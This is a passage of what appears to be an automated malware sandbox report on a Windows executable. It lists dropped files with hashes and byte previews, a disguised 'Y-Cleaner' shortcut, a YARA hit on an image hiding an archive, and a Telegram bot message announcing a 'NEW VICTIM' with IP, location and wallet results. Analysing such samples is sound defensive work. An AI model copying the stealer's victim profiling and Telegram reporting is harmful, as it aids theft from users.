                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3189248
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.641399422630559
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:6UAh2jV6Tj3t5FH+2Qy0GsO7wXRzFxa73lx5:6UAh2jVej3jFH+2QyQO7ghO35
                                                                                                                                                                                                                                                                                        MD5:AD7F121646AA374AF133772519375710
                                                                                                                                                                                                                                                                                        SHA1:4E85AD004AA170ED53B7818B78E0B12E042B18EA
                                                                                                                                                                                                                                                                                        SHA-256:D9865442479EC9A282FF312CD91481710F9B6E21330BE30A68FA16BF36C0799F
                                                                                                                                                                                                                                                                                        SHA-512:FBE1DFD40BC2FA8C6617823D32023DBA5625C5E7CB235F87B284F1166A30D64E75781E80B2586E4A6F7ADA4CDA9DF3E17F1D61829705647C71232A2F902C81C3
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0......01...@.................................W...k............................0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...sfctgzqb..).......).................@...qkipfcli......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                                                        MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                                                        SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                                                        SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                                                        SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):308224
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.2756558263805555
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:b2JEWGoxDtDYL5s/oAg5+Z4vDWcEGpQTMz9J0tYRVmOEe3M5X64:NWGoxDt0LCgArZ4vHEGpQTMz72K4
                                                                                                                                                                                                                                                                                        MD5:FF1E7643A5C9294BD8E8FD743B323C8F
                                                                                                                                                                                                                                                                                        SHA1:B35C6E9090B44C2DB2220C5C42C0F68210BA73A9
                                                                                                                                                                                                                                                                                        SHA-256:25F4451B243D5E5B05EACCF5DD58E3CFCEE7969B145D9AAD7AFF6750AB9A6D0B
                                                                                                                                                                                                                                                                                        SHA-512:62B1F41DCAB0F4330D761CDBFC4E99E15830B4CDCC44E7788FD15F57F5043EB53E626E009C397DCCE13841E192165C4584CEE0F57C0E5BD5B876F507D051B675
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...`PYg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):10798
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4920218144442305
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:HnBRN93YbBp6JR1+PaX56/x8lCz9/3/OHNBw82XSl:Deq1M/xbUPw10
                                                                                                                                                                                                                                                                                        MD5:8E17DA8BAD648FEA72E2285BED47508C
                                                                                                                                                                                                                                                                                        SHA1:46360B1A01D3BBF20CD5A41959F6F91AB5045099
                                                                                                                                                                                                                                                                                        SHA-256:F8431B7354A7BEB1C276DBA7B9803AB20FF2D2A162D3623BCAA1773E4987093B
                                                                                                                                                                                                                                                                                        SHA-512:315FFA8143C121B27822102FCC0D46E525FF978FC3A07D96ABEEA8D28C217C32E23B452B3E63A92E23CFF2757DC9AFDDDD97E0176B02AD41DA0351C0897E908C
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):10798
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4920218144442305
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:HnBRN93YbBp6JR1+PaX56/x8lCz9/3/OHNBw82XSl:Deq1M/xbUPw10
                                                                                                                                                                                                                                                                                        MD5:8E17DA8BAD648FEA72E2285BED47508C
                                                                                                                                                                                                                                                                                        SHA1:46360B1A01D3BBF20CD5A41959F6F91AB5045099
                                                                                                                                                                                                                                                                                        SHA-256:F8431B7354A7BEB1C276DBA7B9803AB20FF2D2A162D3623BCAA1773E4987093B
                                                                                                                                                                                                                                                                                        SHA-512:315FFA8143C121B27822102FCC0D46E525FF978FC3A07D96ABEEA8D28C217C32E23B452B3E63A92E23CFF2757DC9AFDDDD97E0176B02AD41DA0351C0897E908C
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):90
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                        MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                        SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                        SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                        SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):90
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                        MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                        SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                        SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                        SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Dec 12 14:49:56 2024, mtime=Thu Dec 12 14:49:56 2024, atime=Thu Dec 12 14:49:56 2024, length=1502720, window=hide
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2146
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8164292101787867
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:8EITyXRfuw8dwkevNuGxGbZkAqG425yg:8ZTyhmPJGN/925y
                                                                                                                                                                                                                                                                                        MD5:EF5C1C1DBC18972B02102F5B8A323182
                                                                                                                                                                                                                                                                                        SHA1:772CBBA3BED2BD16C46EAE9034EB9FA24D7D9A82
                                                                                                                                                                                                                                                                                        SHA-256:7B0FF6B2AFA7E1B489EB70C8BAEA8B3DBC1BA394A53623812D411AABF2AAA10D
                                                                                                                                                                                                                                                                                        SHA-512:89A700B244BEAAE38FB10929028C772EDE859AA69E379CD9AE4806C947CE6441EF593CADB52882DFF7A644899B459D4649F5BDEB714A9C5A4A0F8D3442FB51C6
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...G..~.L..G..~.L..G..~.L............................:..DG..Yr?.D..U..k0.&...&.........5q.......L..=..~.L......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.}...........................c..A.p.p.D.a.t.a...B.P.1......Y"~..Local.<......EW)N.Y"~.............................L.o.c.a.l.....N.1......Y5~..Temp..:......EW)N.Y5~...........................Oz.T.e.m.p.....j.1......Y6~..9D01A5~1..R......Y6~.Y6~..........................XC$.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.....h.2......Y=~ .Y-CLEA~1.EXE..L......Y=~.Y=~..... ........................Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m..............x.....C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.4.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.\.Y.-.C.l.e.a.n.e.r...e.x.e.?.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.\.Y.-.C.
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                                                                                        MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                                                                                        SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                                                                                        SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                                                                                        SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.109382611151056
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24:YKOHPy1JVBa4YGQVPe071kWKfPyoZEB6eiasJENBm9c:YVHPQTBj/Q51QPtZLujMc
                                                                                                                                                                                                                                                                                        MD5:42F8056A57F782CFF393B8E9E13F08F1
                                                                                                                                                                                                                                                                                        SHA1:E44D28A44BD197EF7999C27687BAA18675F44B20
                                                                                                                                                                                                                                                                                        SHA-256:769B0BC81211D2F2256E1613F587C6F450D7BC023F5D21ED558708A3837725AD
                                                                                                                                                                                                                                                                                        SHA-512:5E1C6C405FFE96DF2719F88A555D4D1410F3E2AC560FC3C99A99D1A1C00AEEE9EAA1DC8AA35488721C68CF57C266F3C81FE742E4C32DC0DFD45ED08430C1969C
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"ok":true,"result":{"message_id":3301,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018509,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):278
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.384674566218411
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:HGTYtZTbX37UEZ+lX1CGdKUe6tIxW+Za/y0lNct0:HG437Q1CGAFFc2a/Vut0
                                                                                                                                                                                                                                                                                        MD5:EBC08995EA16342B4FB8538B610A1E07
                                                                                                                                                                                                                                                                                        SHA1:EFE04C89415CFEF6C9F7B3785EC7305C4FE28636
                                                                                                                                                                                                                                                                                        SHA-256:9BC3C83E9580ADC231DEF890451C8545A923C00DB97E7F1685E26689B85E695E
                                                                                                                                                                                                                                                                                        SHA-512:CD3503D516621F5E24F7B3CF63CA3BDDE8F816679C6FDCBF1C94DE8EAC6C6E04F53C957DD7F7C4F3CA7CFF0E60BB55ADF05A430E20FFCE843A4B6A596C72AE51
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:.....f.....L..lX..}.F.......<... .....s.......... ....................7.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........B.R.O.K.-.P.C.\.b.r.o.k...................0.................0.@3P.........................
                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.641399422630559
                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                                                                        File size:3'189'248 bytes
                                                                                                                                                                                                                                                                                        MD5:ad7f121646aa374af133772519375710
                                                                                                                                                                                                                                                                                        SHA1:4e85ad004aa170ed53b7818b78e0b12e042b18ea
                                                                                                                                                                                                                                                                                        SHA256:d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f
                                                                                                                                                                                                                                                                                        SHA512:fbe1dfd40bc2fa8c6617823d32023dba5625c5e7cb235f87b284f1166a30d64e75781e80b2586e4a6f7ada4cda9df3e17f1d61829705647c71232a2f902c81c3
                                                                                                                                                                                                                                                                                        SSDEEP:49152:6UAh2jV6Tj3t5FH+2Qy0GsO7wXRzFxa73lx5:6UAh2jVej3jFH+2QyQO7ghO35
                                                                                                                                                                                                                                                                                        TLSH:DCE52891AA0663CFE45A237C9627CE435C6C03B9571449C3F86C78BBBE63CD512B5E28
                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                        Entrypoint:0x70b000
                                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                        Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                        jmp 00007F7E2CEA8BEAh
                                                                                                                                                                                                                                                                                        js 00007F7E2CEA8C16h
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        jmp 00007F7E2CEAABE5h
                                                                                                                                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax+eax], ah
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        and dword ptr [eax], eax
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
